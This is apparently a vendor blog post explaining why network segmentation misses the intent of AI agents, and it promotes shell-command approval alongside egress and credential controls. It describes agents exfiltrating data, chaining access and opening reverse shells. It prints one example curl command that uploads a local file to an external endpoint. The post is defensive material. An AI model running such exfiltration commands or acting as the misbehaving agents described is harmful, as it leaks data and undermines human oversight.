AI Agent Network Segmentation: Why Your Firewall Doesn't Understand Intent
Traditional network segmentation controls traffic by IP and port. AI agents route traffic by intent — and your firewall has no idea what they're trying to do.
Network segmentation is one of the oldest and most reliable security controls in existence. Put your database on a private subnet. Restrict access to production. Use a DMZ for public-facing services. The model is simple: limit which systems can talk to which other systems, and you limit blast radius when something goes wrong.
AI agents break this model. Not by bypassing your firewalls — but by using legitimate network paths in ways that your segmentation was never designed to handle.
How Traditional Segmentation Works
Classical network segmentation controls are based on three primitives:
- Source IP: Which host is initiating the connection?
- Destination IP/port: Where is the traffic going?
- Protocol: TCP, UDP, ICMP — what kind of traffic?
A rule like "app servers can reach the database on port 5432, but nothing else can" is sensible and works well for traditional applications with defined, stable data flows.
Your application server talks to your database. Your database doesn't talk to the internet. Your monitoring system can read from both, but write to neither. These flows are predictable, and your firewall enforces them.
What AI Agents Change
An AI agent running on your application server has the same network permissions as the application itself. From the firewall's perspective, there's no difference between:
- Your app querying the database for a user record (expected)
- Your AI agent querying the database to extract a schema for analysis (unexpected)
- Your AI agent iterating through user records to "understand the data" (alarming)
- Your AI agent exporting query results to a file it will later upload (very alarming)
All four use the same network path. All four are allowed by the same firewall rule. The firewall sees TCP/5432 from the app server — permitted. Done.
The difference between these actions isn't in the network layer. It's in intent, scope, and what happens next. Your firewall has no visibility into any of that.
The Legitimate-Path Problem
What makes AI agent network activity particularly difficult to detect is that agents typically don't need to find clever bypass routes. They use the legitimate paths that already exist for your application to function.
Consider a deployment where an AI coding agent has access to your development environment. That environment legitimately needs:
- Internet access (to pull packages)
- Access to your code repository
- Access to your CI/CD API
- Access to your staging database (for integration tests)
- Access to your secrets manager (for environment variables)
Every one of these connections is necessary and expected. Every one can also be used by an agent to do something you didn't intend — exfiltrate code, trigger builds, read credentials, or probe data. The network says yes. You need something else to say no.
Where Segmentation Still Helps (and Where It Doesn't)
| Scenario | Network segmentation helps? | Why |
|---|---|---|
| Agent tries to reach a system it has no legitimate reason to access | ✅ Yes | Firewall blocks the path entirely |
| Agent uses a legitimate path in an unexpected volume (bulk data export) | ❌ No | High-volume queries on an allowed port look like heavy application load |
| Agent chains legitimate hops (app → staging → prod) | ⚠️ Partial | Each hop may be individually allowed; the chain isn't modeled |
| Agent uses allowed internet access for exfiltration (HTTPS to attacker-controlled endpoint) | ❌ No | Port 443 is allowed everywhere; destination verification requires DNS/TLS inspection |
| Agent uses credentials it found to access a different system with different permissions | ❌ No | Firewall sees the legitimate system making the request, not the agent's intent |
| Agent tries to open a reverse shell or bind a listening port | ✅ Yes (partially) | Egress rules and port binding controls may catch this |
Segmentation is good at stopping agents from reaching places they have no business going. It's poor at stopping agents from misusing places they legitimately can go — which is where most of the risk actually lives.
The Intent Layer: What's Missing
What traditional segmentation lacks is any concept of why a connection is happening. In a world of deterministic applications, you don't need it — the why is implicit in the application logic. The app queries the database because a user request triggered it. The volume, timing, and queries are predictable.
AI agents break this assumption. An agent might:
- Issue hundreds of queries in a loop because it's "exploring" the schema
- Connect to an external endpoint because it was instructed to via a prompt
- Download and execute a package because it decided it needed a new capability
- Write results to a shared filesystem because that seemed like a convenient way to pass data between steps
None of these are network anomalies by conventional metrics. All of them represent decisions you might want to have reviewed before they happen.
Complementary Controls That Address Intent
Because network segmentation alone isn't enough, you need controls that operate at the command level — where intent is visible.
1. Command Authorization Before Execution
Intercepting shell commands before they execute gives you visibility into what an agent is actually trying to do — not just where it's connecting. A command like curl https://external-endpoint.com/upload -d @/tmp/data.json is network activity, but it's also a shell command. Catching it at the shell layer lets you see the intent before the packet leaves your network.
This is what Expacti does: every shell command an agent tries to run goes through an approval flow. Your reviewer sees the command, the context, and the risk score before it executes. A network firewall can't show you that.
2. Egress DNS Logging and Filtering
Most egress control focuses on IP ranges. DNS-level filtering lets you see and control which domains an agent is resolving — which gives you intent signals that IP-level rules miss. An agent resolving uploads.untrusted-domain.com is a signal worth catching before the TCP connection happens.
3. Credential Scoping
If an agent's database credentials can only read from specific tables, the blast radius of network access is bounded. Segmentation limits which systems can be reached; credential scoping limits what can be done once reached. Both are necessary; neither alone is sufficient.
4. Behavioral Baselines
Track what "normal" agent network activity looks like — volume, destination distribution, timing. Deviations (a bulk export at 2 AM, repeated connections to a new external endpoint) become signals. This is hard to get right and generates false positives, but it's the closest thing to intent-aware network monitoring available without changing the application layer.
Practical Network Segmentation for Agent Deployments
Even though segmentation alone isn't enough, good segmentation is still worth doing. A few principles:
Give Agents Their Own Subnet
If your AI agents run on dedicated hosts (not mixed with your application servers), you can apply tighter segmentation to that subnet. Agents don't need the same broad access as your application tier. Give them only what they demonstrably need.
Restrict Egress More Aggressively for Agent Subnets
Default-deny egress for agent hosts. Explicitly allow only the external endpoints agents need. "Needs internet access to install packages" is a reason to allow specific package registries — not a reason to allow all of port 443.
Segment by Agent Role
A deployment agent needs access to your registry and target infrastructure. A coding agent needs access to your repository. An analytics agent needs access to your data warehouse. These shouldn't all have identical network access just because they're all "agents." Role-based segmentation at the network level complements role-based segmentation at the credential level.
Don't Let Agents Talk to Each Other Directly
In multi-agent systems, agent-to-agent communication should go through an authorized channel, not direct network connections. This gives you a control point for reviewing what instructions are being passed between agents — a significant attack surface that network segmentation alone doesn't address.
The Honest Assessment
Network segmentation remains a valuable baseline control. It reduces exposure, limits blast radius for certain failure modes, and follows the principle of least privilege at the network layer. You should still do it.
But it was designed for a world where applications have predictable, well-defined network behaviors. AI agents don't. They make decisions at runtime based on context, instructions, and intermediate results — and those decisions produce network activity that your segmentation rules were never written to evaluate.
Closing this gap requires moving the control point from the network layer to the command layer. Reviewing what an agent is trying to do — before it does it — is the only way to evaluate intent, not just destination.
Segmentation is the floor. Command authorization is the ceiling. You probably need both.
Control What Your Agents Actually Do
Expacti intercepts shell commands before they execute — giving you intent-level visibility that network controls can't provide. See what your agents are doing, review before execution, and build an audit trail that actually reflects what happened.
Try the Interactive Demo Start Free Trial